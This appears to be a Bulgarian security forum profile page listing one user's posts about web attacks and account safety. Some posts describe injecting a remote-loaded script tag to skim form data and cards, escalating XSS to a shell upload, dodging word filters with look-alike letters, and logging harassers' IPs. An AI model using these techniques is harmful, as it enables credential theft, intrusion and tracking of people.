Jump to content
¯\_( ツ)_/¯
 • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
 • Sponsored Ad

TheZero

Потребители
 • Мнения

  33
 • Присъединил/а се

 • Последно посещение

 • Days Won

  6

TheZero last won the day on Март 23

TheZero had the most liked content!

Обществена Репутация

17 Good

Social Info

1 Последовател

Относно TheZero

 • Ранг
  Начинаещ

Последни посетители

526 профилни разглеждания
 1. Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
 2. Проверете, дали са ви хакнали? Публикуваха списък на 7,695,066,389 хакнати акаунти. Това е световен рекорд от всички времена. На сайта https://haveibeenpwned.com/ може да проверите, дали и вашият e-mail адрес е компрометиран. Добре е, да си смените веднага паролите. На същият сайт има доста подробности около пробивите. Също така, може да се свали и списъка на паролите. https://haveibeenpwned.com/Passwords
 3. TheZero

  Комуникация

  Колеги, добре е, че държите на българското, но защо не си прегледате никовете? Май и те не са български.
 4. Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.
 5. TheZero

  Ограбиха ме!

  Това, би трябвало да ти помогне: https://www.malwarebytes.com/mwb-download/
 6. Наистина гигантска база данни за MD5 hashes. https://hashkiller.co.uk/md5-decrypter.aspx
 7. TheZero

  Ограбиха ме!

  Ако е така, както описваш, това е признак на шпионски софтуер. Използвай друго устройство за смяна на паролите, докато си изчистиш компютъра/телефона. cybercrime.bg няма да ти помогнат, за тях това са дреболии.
 8. Бях чел нещо подобно и за хиляди е-магазини натряскани с промени в javascript файловете. Защо ли не си мушкат злобните скриптове в server side файлове? Така поне остават - "невидими". Явно имат оправдателна причина. Попадал съм на шмекерии в php файлове за крадене на пресни данни, които пак препращат плячката навън. Големи изобретателности!
 9. Ето това е истината! Единствено "на живо" се правят експерименти. Тестове на localhost не означават нещо особено.
 10. Ха, интересно! Все пак има напредък, щом са ти обърнали внимание и дори са те award-нали с 100 £. Като стане дума за XSS, обикновено се мисли, че най-много може да се задигне админ сесията. Истинското шоу става след като инжектнатият javascript сочи към payload, предизвикващ CSFU (Cross-Site File Upload). И бууум - имаш качен shell. Хаха, това с инжектирането на <div> го имаше и на № 1 българската емейл платформа, разбира се id-то на div-а е дефинирано за цялата страница. Жертвата си отваря полученият имейл и що да види - "Сесията ви изтече, влезте отново!" Смях голям....
 11. Пробвай http://localhost/~jertva Като замениш localhost с IP-то на сървъра и jertva с юзъра. Късмет!
 12. Най-вероятно на повечето от вас се случвало да срещне цензура на определени думи , когато се опитва да напише коментар под някоя статия, пост и така нататък в интернет. Най-малкото сте забелязвали зведички (******), вместо определена дума, която предполагате, че е филтрирана. Обикновено се поставят тирета или празни пространства между сричките, но това не е истинско решение. За щастие или нещастие, повечето сайтове са на UTF-8 charset и това може да позволи видимо заобикаляне на забраните. Да приемем, че думите - глупак, свиня, простак, са в черен списък и на тяхно място се появяват ******. В такъв случвай се търси визуален еквивалент на дадена буква от кирилицата в латиницата. В "глупак" заместваме буквата "а" с латинското "a". В "свиня" вместо "с" поствавяме "c" (це) от кирилицата, а в простак можем да заменим "р", "о", "с", и "а". Както виждате цедилката се пропуква доста лесно. Не се и досещам за някакви мерки и защита.
 13. На забравена парола, изписва положителен отговор на произволни мейл адреси. Допуснах, че може да приеме и HTML/javascript тагове - резултат отрицателен.
 14. Свалили те, цървули. Ако правилата на форума позволяваха, бих направил демо как се обезобразява "свалената" жертва, барабар с източника на глупавата "новина".
 15. Има безплатни сайтове, които дават възможност за проследяване на IP адресите. Търси IP logger в google. Генерираш линк и изпращаш на тормозещите, след което сравняваш IP адресите им.
×
×
 • Създай нов...

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.